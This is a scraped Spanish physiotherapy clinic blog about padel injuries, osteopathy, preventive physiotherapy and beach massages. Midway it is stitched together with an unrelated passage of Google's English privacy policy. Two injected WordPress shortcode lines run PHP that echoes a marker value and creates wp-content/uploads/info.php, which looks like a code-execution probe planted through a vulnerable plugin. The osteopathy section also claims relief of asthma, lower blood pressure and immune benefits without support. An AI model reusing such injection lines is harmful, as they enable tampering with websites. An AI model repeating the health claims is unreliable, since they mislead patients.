fisioterapia las rozas

Fisioterapia Las Rozas: Lesiones de pádel

Fisioterapia Las Rozas: Peligros del pádel

El pádel es el deporte que más crecimiento ha presentado en España durante los últimos años. Este deporte es apto para ser practicado por cualquier persona, ya que su exigencia física es moderada y se efectúa en una cancha muy cómoda. Sin embargo, durante la práctica de este deporte se pueden sufrir algunas lesiones si no se cuenta con una técnica adecuada… aunque también existen casos de lesiones que son ocasionadas por recuperación inadecuada de otras lesiones, mala alimentación, sobreentrenamiento y juegos intensos. A continuación te vamos a presentar las 4 lesiones más comunes que suelen ocurrir en el pádel y sus posibles causas.

Esguince de tobillo.

El tobillo es la parte del cuerpo que sufre más tensión durante los entrenamientos y juegos. Aunque para ser más preciso es la articulación del tobillo la que sufre mayor tensión durante esta actividad. Esta lesión puede ocasionarse por una mala postura al apoyarse para golpear la pelota, como también puede ser ocasionada por déficit de nutrientes y entrenamientos intensos. Los esguinces de tobillos pueden ser tratados con fisioterapia Las Rozas, siendo una excelente alternativa para la recuperación y rehabilitación del ligamento lateral externo.

Lesiones de ligamentos de rodilla.

Cuando se sufre de cualquier dolencia en la rodilla, indistintamente de si es leve o fuerte, se debe acudir con un fisioterapeuta. Las lesiones de ligamentos de rodilla deben ser diagnosticadas en su etapa temprana, ya que una rotura total del ligamento requiere un proceso más largo y complicado para su recuperación. Las lesiones de rodillas se producen a menudo por no flexibilizar correctamente las rodillas durante el juego. Mantener las rodillas semirrígidas ocasiona una carga adicional de tensión en las mismas durante el juego, lo cual en combinación con movimientos rápidos frecuentemente conducen a una lesión.

Lumbalgia.

En el pádel la zona lumbar realiza un esfuerzo superior al que pueda realizar cualquier parte del cuerpo. Esta zona se mueve con diversos movimientos y en todos los planos posibles. Esta zona puede verse afectada si no se calienta de una forma adecuada antes de comenzar a jugar o entrenar.

Tendinitis y tendinosis del manguito de los rotadores del hombro.

Estas lesiones pueden ser ocasionadas por los juegos intensos y entrenamientos exigentes. Por tal motivo, es recomendable mantener una dieta balanceada rica en nutrientes que incentiven la regeneración y resistencia durante la práctica de este deporte. La tendinitis es una inflamación en la articulación del manguito rotador mientras que la tendinosis es una degeneración de la misma. Ambas afecciones pueden ser tratadas con fisioterapia Las Rozas.

Osteopata las rozas

Osteopata las Rozas: Ventajas dela osteopatía frente a otros tratamientos

Como su osteopata Las Rozas podemos decir que la osteopatía es una medicina natural que tiene la intención de restaurar la función normal del cuerpo tratando las causas del dolor y los desequilibrios que pueden ser el resultado de lesiones, enfermedades, estrés y la cronicidad de la vida diaria. Esta disciplina apoya la filosofía de que el cuerpo tiene una capacidad innata y natural para auto-regular y sanar.

Un osteópata usará sus manos para tratar su cuerpo usando una mezcla de técnicas suaves incluyendo:

– Masaje para liberar y relajar los músculos
– Estiramiento de articulaciones rígidas
– Moviendo sus articulaciones a través de su rango natural de movimiento o articulación

Los beneficios de la osteopatía para curar el dolor

Los osteópatas tratan el dolor que usted experimenta de una manera especial, la cual, lo considera como una persona y su cuerpo como un todo. El tratamiento osteopático puede utilizarse para reducir y curar eficazmente el dolor en un número de diferentes áreas incluyendo dolor de espalda, dolor de cuello, dolores de cabeza y esguinces de tobillo. La osteopatía puede:

– Eliminar la causa subyacente del dolor
– Reducir el dolor y la rigidez en los músculos y las articulaciones
– Aumentar el rango de movimientos en las articulaciones
– Tratar problemas espinales resultantes de una mala postura o lesiones del disco vertebral
– Aliviar el dolor crónico mediante un tratamiento no invasivo
– Disminuir la tensión en las articulaciones
– Reducir la tensión en el cuerpo
– Aliviar los dolores de cabeza por tensión y migrañas
– Ayudar al cuerpo a adaptarse a los cambios hormonales y estructurales durante el embarazo

Los beneficios de la osteopatía para reducir el malestar de enfermedades crónicas

Su osteópata es capaz de proporcionar tratamientos que proporcionan alivio de los síntomas de muchas enfermedades crónicas como el asma, la artritis y el síndrome del intestino irritable.

Los beneficios de la osteopatía para prevenir lesiones

Los osteópatas pueden ayudar a prevenir una reaparición de una lesión o condición aguda o el desarrollo de una lesión debido a factores de estilo de vida. La osteopatía puede:

– Reducir cicatrices y adherencias
– Tratar el trauma resultante de accidentes (lesiones deportivas, lesiones de vehículos de motor)
– Alentar al cuerpo a sanarse

Los beneficios de la osteopatía para la relajación

Al darle tiempo para ser consciente de sí mismo y su cuerpo, la osteopatía puede ser muy relajante. También se sabe que reduce los niveles de estrés aumentando la eficiencia de los sistemas de su cuerpo como el flujo sanguíneo, el suministro de nervios y el sistema inmunológico. La osteopatía puede:

– Aumentar la circulación
– Reducir la presión arterial

Recuerde cualquier duda estoy a su disposición su osteopata Las Rozas

fisioterapia las rozas

Fisioterapia las rozas: La fisioterapia como tratamiento preventivo

Los expertos en fisioterapia las rozas sabemos que la salud preventiva es a veces un aspecto subexpuesto del sistema de salud. Cualquier programa o intervención que pueda mejorar su salud física y emocional actual disminuirá a largo plazo la posibilidad de incurrir en una lesión o enfermedad. Muchos aspectos de la sociedad actual son perjudiciales para nuestra salud física. Vivimos en comunidades donde los viajes se realizan en automóvil, en lugar de hacerlo a pie o en bicicleta. Pasamos horas crecientes en trabajos sedentarios frente a computadoras o equipos automatizados. Además de que nuestra comida es cada vez más procesada y conservada.
En general, esto deja a los ciudadanos en peores condiciones de salud física. Los niños de también están demostrando las tendencias chocantes hacia niveles crecientes de obesidad y del tiempo pasado en la televisión y las pantallas de computadora, en lugar de presentar niveles sanos de actividad física. Como resultado, las enfermedades de estilo de vida como la diabetes, las enfermedades cardiovasculares y la hipertensión también están en aumento.

¡Sin embargo, las soluciones a estos problemas están a nuestro alcance!

Como centro de fisioterpia Las Rozas sabemos cómo ayudar a aquellos que tienen deterioros porque entendemos los procesos que inicialmente los causaron al inicio. Ya se trate de una lesión deportiva, neuropatía, el uso excesivo o cualquier otra cosa que puede causar deterioro, los fisioterapeutas podemos ofrecer asesoramiento y orientación sobre cómo evitar estas causas de discapacidad.

Somos líderes en prevención.

Las personas que esperan mejorar su nivel de salud física pueden hacer mejoras muy grandes con cambios muy pequeños en su estilo de vida. Por ejemplo, recientes investigaciones sugieren que para las personas con sobrepeso, una disminución tan pequeña como 5-10 por ciento de la masa corporal puede mejorar significativamente la salud en términos de presión arterial, glucosa en la sangre, los niveles de dolor y la función cardíaca.
El aumento de los niveles de actividad física en combinación con una nutrición adecuada son los temas recurrentes en la gestión de estas enfermedades “relacionadas con el estilo de vida”. Mejor aún, para prevenir estas enfermedades puede, puede incorporar un nivel saludable de actividad física en su estilo de vida, antes de que ocurra el problema.

La fisioterapia ofrece varios programas preventivos de salud para ayudarle a comenzar, lo que puede incluir:

– Pruebas de acondicionamiento físico y diseño de programa de ejercicios
– Programas de ejercicios cardiovasculares
– Programas de control de peso / diabetes
– Condicionamiento específico deportivo
– Prevención de lesiones
– Prevención de caídas
– Prevención y gestión de las lesiones en el lugar de trabajo
– Rehabilitación preoperatoria para cirugía de reemplazo / reconstrucción articular
– Rehabilitación preoperatoria para cirugía general

Para cualquier duda consúltenos aquí somos su expertos en fisioterapia Las Rozas

Rehabilitación y fisioterapia - Blog de Rehabtiva - Masaje Las Rozas

Rehabilitación y fisioterapia

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Masajes en la playa mucho ojo - Fisioterapia Rehabtiva Las Rozas

Masajes en la playa mucho ojo…

Los masajes en la playa son una constante que ya se ha hecho muy popular. Los masajes en la playa es una de las figuras de intrusismo que sufrimos los fisioterapeutas titulados. Pero esa no es la razón por la que avisamos de los riesgos de acudir a esa práctica. Egoístamente hablando estos “masajistas playeros” suelen ser una fuente de trabajo extra a la vuelta de las vacaciones. Pero ya os lo hemos contado en otras ocasiones, nuestra misión aparte de terapéutica es preventiva. No solo aplicamos terapias a lesiones o dolencias. Nuestro trabajo va más allá, trata de evitar esas dolencias. Con correcciones posturales, con un trabajo previo didáctico. Por eso no nos gusta tratar a gente que viene con problemas después de “gozar” de masajes en la playa. Preferimos no veros en la consulta por ese tema.

Masajes terapéuticos en Las Rozas

Rehabtiva ofrece a sus clientes distintas opciones de terapia. El masaje es una de esas terapias, ofrecemos masajes en Las Rozas. Tenemos un servicio de Fisioterapia Deportiva en Las Rozas, alrededor del que gira toda nuestra actividad. Al tiempo ofrecemos más terapias, como la Crioterapia o la Osteopatía. Puedes acceder a nuestros servicios en Las Rozas, llamándonos al +34 91 710 5425O si lo deseas puedes acceder a nuestro servicio de cita online Rehabtiva Las Rozas.

Leer más